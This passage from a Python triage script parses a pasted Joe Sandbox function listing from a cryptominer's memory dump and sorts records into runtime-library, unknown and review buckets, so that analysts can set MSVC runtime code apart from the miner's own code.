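• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• Opcode ID: f78dc03a8b7e459b2f5a523a33989f4a04428b56cdb294ea6966631ac146a953
APIs
• std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF752025471
• _CxxThrowException.LIBVCRUNTIME ref: 00007FF752025482
  • Part of subcall function 00007FF752026EA8: RaiseException.KERNEL32(?), ref: 00007FF752026F4F
Strings
Memory Dump Source
• Source File: 00000014.00000002.2414937955.00007FF752001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF752000000, based on PE: true
Similarity
• API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
• String ID: Unknown exception
• Opcode ID: badd8b7e3d07d99b52e3bffc87efa81072822f9ce37558ce68a18c88b8dc1f94
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
CRT_MODULES = {"LIBCMT", "LIBVCRUNTIME"}  # statically linked MSVC runtime
# KERNEL32 calls made by the MSVC runtime's own TLS and exception shims. Treating them
# as runtime plumbing is this example's analyst heuristic, not a Joe Sandbox rule.
CRT_SHIM_APIS = {"TlsSetValue", "FlsSetValue", "RaiseException", "RtlPcToFileHeader"}

API_RE = re.compile(r"(?P<api>[\w:]+)\.(?P<module>[A-Z][A-Z0-9_]+)")
REF_RE = re.compile(r"ref:\s*(?P<ref>[0-9A-Fa-f]+)")
SUBCALL_RE = re.compile(r"Part of subcall function\s+(?P<caller>[0-9A-Fa-f]+):")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")
SOURCE_RE = re.compile(r"Source File:\s*(?P<dump>\S+?),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+)")


def parse_records(text: str) -> List[Dict]:
    """Each record opens with an 'APIs' header; the other headers switch sections."""
    records: List[Dict] = []
    section, rec = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
            if line == "APIs":
                rec = {"apis": [], "strings": [], "dump": None, "offset": None, "similarity": {}}
                records.append(rec)
            continue
        if rec is None or not line:
            continue
        if section == "APIs":
            m = API_RE.search(line)
            if m:  # subcall lines are reached through another function; keep that distinction
                sub, ref = SUBCALL_RE.search(line), REF_RE.search(line)
                rec["apis"].append({"api": m.group("api"), "module": m.group("module"),
                                    "ref": ref.group("ref") if ref else None,
                                    "subcall": sub is not None,
                                    "caller": sub.group("caller") if sub else None})
        elif section == "Strings":
            rec["strings"].append(line.lstrip("• "))
        elif section == "Memory Dump Source":
            m = SOURCE_RE.search(line)
            if m:
                rec["dump"], rec["offset"] = m.group("dump"), m.group("offset")
        elif section == "Similarity":
            m = KV_RE.match(line)
            if m:
                rec["similarity"][m.group("key").strip()] = m.group("value").strip()
    return records


def classify(rec: Dict) -> str:
    """'crt' when every direct call is runtime plumbing, 'unknown' when no APIs are
    listed, 'review' otherwise (the bucket worth opening in IDA)."""
    direct = [a for a in rec["apis"] if not a["subcall"]]
    if not direct:
        return "unknown"
    if all(a["module"] in CRT_MODULES or a["api"] in CRT_SHIM_APIS for a in direct):
        return "crt"
    return "review"


def dynamic_targets(rec: Dict) -> List[str]:
    """try_get_function is the CRT's late-binding thunk; the API it resolves at run time
    is named in the record's String ID ('$' separates several, as in the API ID field)."""
    if not any(a["api"] == "try_get_function" for a in rec["apis"]):
        return []
    return [s for s in rec["similarity"].get("String ID", "").split("$") if s]


def triage(text: str) -> Dict[str, List[str]]:
    """Opcode IDs grouped by classification."""
    buckets: Dict[str, List[str]] = {"crt": [], "unknown": [], "review": []}
    for rec in parse_records(text):
        buckets[classify(rec)].append(rec["similarity"].get("Opcode ID", "?"))
    return buckets
```

Run `triage()` over the full function listing pasted from the report: both records in the sample land in the `crt` bucket, and `dynamic_targets()` reports that the first one resolves FlsSetValue at run time, which is exactly why the static listing shows only TlsSetValue. Anything that ends up in `review` is where the miner's own code (pool connection, injection, persistence) will be.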